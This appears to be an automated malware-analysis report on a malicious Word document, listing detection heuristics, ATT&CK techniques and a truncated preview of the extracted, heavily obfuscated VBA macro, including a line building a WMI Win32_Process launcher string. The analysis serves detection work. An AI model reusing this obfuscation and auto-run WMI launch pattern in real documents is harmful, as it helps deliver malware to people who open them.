Risk Score: 282 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1137.001 Office Application Startup: Office Application
The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_WMI_PROCESS_CREATE' indicates the macro attempts to launch a process via WMI. The presence of an 'autoopen' macro, detected by 'OLE_LEGACY_WORDBASIC_AUTOEXEC' and 'OLE_VBA_AUTOOPEN', suggests the malicious code executes automatically upon opening the document. The script's complexity and obfuscation make it difficult to determine the exact payload, but the overall pattern points to a downloader.
Heuristics (8)
- ClamAV: Doc.Malware.Dpzn-6865610-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Dpzn-6865610-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 2adac7bf5211adaa8f02ce4a1df3651bbfd7b98c05a4e0b82734e74df6003c4e) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57571 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "i4__069"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S__5_9"
Function w681_65()
Select Case O1_088
Case 989112488
T5_1985 = Log(k133__2)
w47832 = CDate(412180375)
X0__466 = Fix(327689253 + 532122644 + s5__4_51 - Oct(116123150))
d551__ = Cos(838999496 - Sqr(211033595 - Atn(596790493)) - 656074700 + 691793211)
End Select
Select Case p_1_6__
Case 645094846
t381_7 = Log(T56401)
E5144_ = CDate(331569715)
R08992_ = Fix(48724903 + 844243764 + i226623 - Oct(582570588))
D104_99 = Cos(345851876 - Sqr(22855915 - Atn(954874129)) - 835924325 + 496444773)
End Select
Select Case o6744_1
Case 353388217
S70673 = Log(Q9__8_3)
Y4_59682 = CDate(481165943)
E10_0_ = Fix(970700126 + 899881013 + T9366_ - Oct(525264214))
d2__825_ = Cos(771181925 - Sqr(68816346 - Atn(104637905)) - 292588774 + 987998990)
End Select
Select Case j76_70
Case 913866681
k_9_06 = Log(f83_98_)
I44505 = CDate(879793349)
R29_5_6 = Fix(355564061 + 844613353 + s_88___2 - Oct(160110351))
i36802_1 = Cos(429552670 - Sqr(730916785 - Atn(565140922)) - 342905090 + 31145824)
End Select
Select Case U56___
Case 546386556
q97_11 = Log(F_48__66)
s537738 = CDate(572365110)
B66_70 = Fix(193541046 + 295663342 + f78__518 - Oct(559788259))
W4604_62 = Cos(302969357 - Sqr(283840797 - Atn(487181471)) - 852742645 + 349462739)
End Select
Select Case M_79__
Case 421611106
j29_2801 = Log(E1_04__9)
i_1___ = CDate(210261279)
U_607_6 = Fix(963439407 + 23482163 + S4_824 - Oct(505486632))
s_2222 = Cos(689128759 - Sqr(4520637 - Atn(730835165)) - 177270389 + 207950300)
End Select
Select Case T___9643
Case 251306671
r98_91 = Log(r__385)
C69113__ = CDate(357543196)
V_3_8_7 = Fix(807596840 + 984015382 + P_473_0 - Oct(763968225))
a73_901 = Cos(658251677 - Sqr(856887463 - Atn(723742852)) - 507398116 + 53238946)
End Select
Select Case L91361
Case 184153276
i691681 = Log(F0__88)
w73_173 = CDate(828120808)
V_9206 = Fix(42910562 + 931041674 + w5712_78 - Oct(314522656))
Z7_20_ = Cos(468064190 - Sqr(515105482 - Atn(916001680)) - 443595880 + 234455977)
End Select
Select Case U_4__3
Case 681922299
J0781_7 = Log(N1476_)
M3_9_27 = CDate(115889972)
V16207 = Fix(714280636 + 749440636 + k_3_6807 - Oct(839351765))
U95_8__ = Cos(305556619 - Sqr(534869588 - Atn(13668019)) - 453225823 + 816902808)
End Select
End Function
Function Q9__0891(d1__81_3, j_4528)
On Error Resume Next
Select Case i3_7459
Case 311734594
G7810_0_ = Log(c_779__9)
D84__762 = CDate(820156512)
a33___1_ = Fix(107947721 + 621240739 + b20_4_ - Oct(228459638))
f9994833 = Cos(534411737 - Sqr(613351241 - Atn(963603830)) - 586348357 + 37158108)
End Select
Select Case a5_80_0
Case 915257691
C66803 = Log(L25383_)
t6__0_86 = CDate(78644011)
Z42__407 = Fix(910110065 + 829736045 + M88635_8 - Oct(709054119))
n87768_2 = Cos(575299067 - Sqr(743103115 - Atn(876601799)) - 844109974 + 987458867)
End Select
Q26_9__ = j_4__9 + "winmgmts:Win32_ProcessStartup" + P__3_239
Select Case u____8_3
Case 156968570
j6__0401 = Log(z8_94_)
z4__74 = CDate(182477142)
T721_7_ = Fix(2479576 + 867003839 + j37800_ - Oct(492998035))
k94135 = Cos(298985 - Sqr(
... (truncated)